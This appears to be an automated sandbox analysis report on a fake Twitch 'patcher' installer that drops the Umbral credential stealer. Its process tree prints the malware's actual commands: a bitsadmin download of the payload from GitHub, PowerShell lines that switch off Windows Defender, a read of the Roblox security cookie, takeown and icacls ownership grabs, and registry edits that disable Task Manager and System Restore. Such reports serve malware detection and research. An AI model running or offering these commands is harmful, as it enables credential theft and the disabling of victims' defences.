Analysis
-
max time kernel
105s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-08-2024 22:21
Static task
static1
Behavioral task
behavioral1
Sample
Twitch-Patcheur-30.2.2-Windows-Installer.exe
Resource
win11-20240802-en
General
-
Target
Twitch-Patcheur-30.2.2-Windows-Installer.exe
-
Size
187KB
-
MD5
2dde97d542da5e24e9a7b8dc754cfe23
-
SHA1
5f73f214ba314bacbc8367e5c97ba0283dd0a6e5
-
SHA256
165ba0408d39838ba395b44d1666c06e6a9d0db34907020bc524763d97c286a6
-
SHA512
58754183f468c4bb0b063f0d2507df97b2bef7f6ba25f4ceaaacb66d07f6a1ba470bf5bda1d68837046f90b797e3bb13a6da5315dbcc421ebf323190ab3c8797
-
SSDEEP
3072:PV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPu43g0UasVmkoYcMK0:Ct5hBPi0BW69hd1MMdxPe9N9uA069TBg
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/4560-2-0x0000014D20DD0000-0x0000014D20E10000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 6 IoCs
flow pid Process 10 1708 WScript.exe 13 1708 WScript.exe 18 5020 WScript.exe 19 5020 WScript.exe 20 5020 WScript.exe 21 5020 WScript.exe -
pid Process 5104 powershell.exe 1164 powershell.exe 1576 powershell.exe 1272 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2404 bitsadmin.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 900 takeown.exe 1576 icacls.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1684 melter.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 900 takeown.exe 1576 icacls.exe -
Enumerates connected drives 3 TTPs 47 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\D: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\H: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\H: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\I: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 11 discord.com 16 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 36 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\wallpaper reg.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa cmd.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language melter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2208 cmd.exe 4324 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1876 timeout.exe 3688 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3728 wmic.exe -
Kills process with taskkill 11 IoCs
pid Process 3848 taskkill.exe 3556 taskkill.exe 2572 taskkill.exe 2200 taskkill.exe 2724 taskkill.exe 1272 taskkill.exe 3700 taskkill.exe 1804 taskkill.exe 4500 taskkill.exe 1392 taskkill.exe 2316 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4324 PING.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4560 Umbral.exe 1272 powershell.exe 1272 powershell.exe 5104 powershell.exe 5104 powershell.exe 1164 powershell.exe 1164 powershell.exe 1776 powershell.exe 1776 powershell.exe 1576 powershell.exe 1576 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 1104 msedge.exe 1104 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeDebugPrivilege 4560 Umbral.exe Token: SeIncreaseQuotaPrivilege 2460 wmic.exe Token: SeSecurityPrivilege 2460 wmic.exe Token: SeTakeOwnershipPrivilege 2460 wmic.exe Token: SeLoadDriverPrivilege 2460 wmic.exe Token: SeSystemProfilePrivilege 2460 wmic.exe Token: SeSystemtimePrivilege 2460 wmic.exe Token: SeProfSingleProcessPrivilege 2460 wmic.exe Token: SeIncBasePriorityPrivilege 2460 wmic.exe Token: SeCreatePagefilePrivilege 2460 wmic.exe Token: SeBackupPrivilege 2460 wmic.exe Token: SeRestorePrivilege 2460 wmic.exe Token: SeShutdownPrivilege 2460 wmic.exe Token: SeDebugPrivilege 2460 wmic.exe Token: SeSystemEnvironmentPrivilege 2460 wmic.exe Token: SeRemoteShutdownPrivilege 2460 wmic.exe Token: SeUndockPrivilege 2460 wmic.exe Token: SeManageVolumePrivilege 2460 wmic.exe Token: 33 2460 wmic.exe Token: 34 2460 wmic.exe Token: 35 2460 wmic.exe Token: 36 2460 wmic.exe Token: SeIncreaseQuotaPrivilege 2460 wmic.exe Token: SeSecurityPrivilege 2460 wmic.exe Token: SeTakeOwnershipPrivilege 2460 wmic.exe Token: SeLoadDriverPrivilege 2460 wmic.exe Token: SeSystemProfilePrivilege 2460 wmic.exe Token: SeSystemtimePrivilege 2460 wmic.exe Token: SeProfSingleProcessPrivilege 2460 wmic.exe Token: SeIncBasePriorityPrivilege 2460 wmic.exe Token: SeCreatePagefilePrivilege 2460 wmic.exe Token: SeBackupPrivilege 2460 wmic.exe Token: SeRestorePrivilege 2460 wmic.exe Token: SeShutdownPrivilege 2460 wmic.exe Token: SeDebugPrivilege 2460 wmic.exe Token: SeSystemEnvironmentPrivilege 2460 wmic.exe Token: SeRemoteShutdownPrivilege 2460 wmic.exe Token: SeUndockPrivilege 2460 wmic.exe Token: SeManageVolumePrivilege 2460 wmic.exe Token: 33 2460 wmic.exe Token: 34 2460 wmic.exe Token: 35 2460 wmic.exe Token: 36 2460 wmic.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeIncreaseQuotaPrivilege 2616 wmic.exe Token: SeSecurityPrivilege 2616 wmic.exe Token: SeTakeOwnershipPrivilege 2616 wmic.exe Token: SeLoadDriverPrivilege 2616 wmic.exe Token: SeSystemProfilePrivilege 2616 wmic.exe Token: SeSystemtimePrivilege 2616 wmic.exe Token: SeProfSingleProcessPrivilege 2616 wmic.exe Token: SeIncBasePriorityPrivilege 2616 wmic.exe Token: SeCreatePagefilePrivilege 2616 wmic.exe Token: SeBackupPrivilege 2616 wmic.exe Token: SeRestorePrivilege 2616 wmic.exe Token: SeShutdownPrivilege 2616 wmic.exe Token: SeDebugPrivilege 2616 wmic.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe 1104 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1912 PickerHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 488 wrote to memory of 2260 488 Twitch-Patcheur-30.2.2-Windows-Installer.exe 78 PID 488 wrote to memory of 2260 488 Twitch-Patcheur-30.2.2-Windows-Installer.exe 78 PID 2260 wrote to memory of 2404 2260 cmd.exe 80 PID 2260 wrote to memory of 2404 2260 cmd.exe 80 PID 2260 wrote to memory of 4560 2260 cmd.exe 82 PID 2260 wrote to memory of 4560 2260 cmd.exe 82 PID 2260 wrote to memory of 900 2260 cmd.exe 83 PID 2260 wrote to memory of 900 2260 cmd.exe 83 PID 2260 wrote to memory of 1576 2260 cmd.exe 84 PID 2260 wrote to memory of 1576 2260 cmd.exe 84 PID 2260 wrote to memory of 3232 2260 cmd.exe 85 PID 2260 wrote to memory of 3232 2260 cmd.exe 85 PID 2260 wrote to memory of 4548 2260 cmd.exe 86 PID 2260 wrote to memory of 4548 2260 cmd.exe 86 PID 4560 wrote to memory of 2460 4560 Umbral.exe 87 PID 4560 wrote to memory of 2460 4560 Umbral.exe 87 PID 2260 wrote to memory of 4828 2260 cmd.exe 89 PID 2260 wrote to memory of 4828 2260 cmd.exe 89 PID 2260 wrote to memory of 1708 2260 cmd.exe 90 PID 2260 wrote to memory of 1708 2260 cmd.exe 90 PID 2260 wrote to memory of 1876 2260 cmd.exe 91 PID 2260 wrote to memory of 1876 2260 cmd.exe 91 PID 4560 wrote to memory of 568 4560 Umbral.exe 93 PID 4560 wrote to memory of 568 4560 Umbral.exe 93 PID 4560 wrote to memory of 1272 4560 Umbral.exe 95 PID 4560 wrote to memory of 1272 4560 Umbral.exe 95 PID 4560 wrote to memory of 5104 4560 Umbral.exe 97 PID 4560 wrote to memory of 5104 4560 Umbral.exe 97 PID 4560 wrote to memory of 1164 4560 Umbral.exe 99 PID 4560 wrote to memory of 1164 4560 Umbral.exe 99 PID 4560 wrote to memory of 1776 4560 Umbral.exe 101 PID 4560 wrote to memory of 1776 4560 Umbral.exe 101 PID 4560 wrote to memory of 2616 4560 Umbral.exe 103 PID 4560 wrote to memory of 2616 4560 Umbral.exe 103 PID 4560 wrote to memory of 4936 4560 Umbral.exe 105 PID 4560 wrote to memory of 4936 4560 Umbral.exe 105 PID 4560 wrote to memory of 2400 4560 Umbral.exe 107 PID 4560 wrote to memory of 2400 4560 Umbral.exe 107 PID 4560 wrote to memory of 1576 4560 Umbral.exe 109 PID 4560 wrote to memory of 1576 4560 Umbral.exe 109 PID 4560 wrote to memory of 3728 4560 Umbral.exe 111 PID 4560 wrote to memory of 3728 4560 Umbral.exe 111 PID 4560 wrote to memory of 2208 4560 Umbral.exe 113 PID 4560 wrote to memory of 2208 4560 Umbral.exe 113 PID 2208 wrote to memory of 4324 2208 cmd.exe 115 PID 2208 wrote to memory of 4324 2208 cmd.exe 115 PID 2260 wrote to memory of 1880 2260 cmd.exe 116 PID 2260 wrote to memory of 1880 2260 cmd.exe 116 PID 2260 wrote to memory of 2932 2260 cmd.exe 117 PID 2260 wrote to memory of 2932 2260 cmd.exe 117 PID 2260 wrote to memory of 3688 2260 cmd.exe 118 PID 2260 wrote to memory of 3688 2260 cmd.exe 118 PID 2260 wrote to memory of 1392 2260 cmd.exe 120 PID 2260 wrote to memory of 1392 2260 cmd.exe 120 PID 2260 wrote to memory of 1272 2260 cmd.exe 121 PID 2260 wrote to memory of 1272 2260 cmd.exe 121 PID 2260 wrote to memory of 3700 2260 cmd.exe 122 PID 2260 wrote to memory of 3700 2260 cmd.exe 122 PID 2260 wrote to memory of 3848 2260 cmd.exe 220 PID 2260 wrote to memory of 3848 2260 cmd.exe 220 PID 2260 wrote to memory of 2316 2260 cmd.exe 222 PID 2260 wrote to memory of 2316 2260 cmd.exe 222 PID 2260 wrote to memory of 3556 2260 cmd.exe 125 PID 2260 wrote to memory of 3556 2260 cmd.exe 125 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 568 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Twitch-Patcheur-30.2.2-Windows-Installer.exe"C:\Users\Admin\AppData\Local\Temp\Twitch-Patcheur-30.2.2-Windows-Installer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\827E.tmp\827F.tmp\8280.bat C:\Users\Admin\AppData\Local\Temp\Twitch-Patcheur-30.2.2-Windows-Installer.exe"2⤵
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe3⤵
- Download via BitsAdmin
PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
PID:568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:4936
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1576
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:3728
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4324
-
-
-
-
C:\Windows\system32\takeown.exetakeown /f C:\*.*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\system32\icacls.exeIcacls C:\*.* /C /G Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1576
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:3232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:4548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3925.vbs"3⤵PID:4828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus4⤵
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1104 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc1ba43cb8,0x7ffc1ba43cc8,0x7ffc1ba43cd85⤵PID:2888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2052 /prefetch:25⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:35⤵PID:3480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:85⤵PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:15⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:15⤵PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,11417581413993660795,11166659114998718079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 /prefetch:85⤵PID:5400
-
-
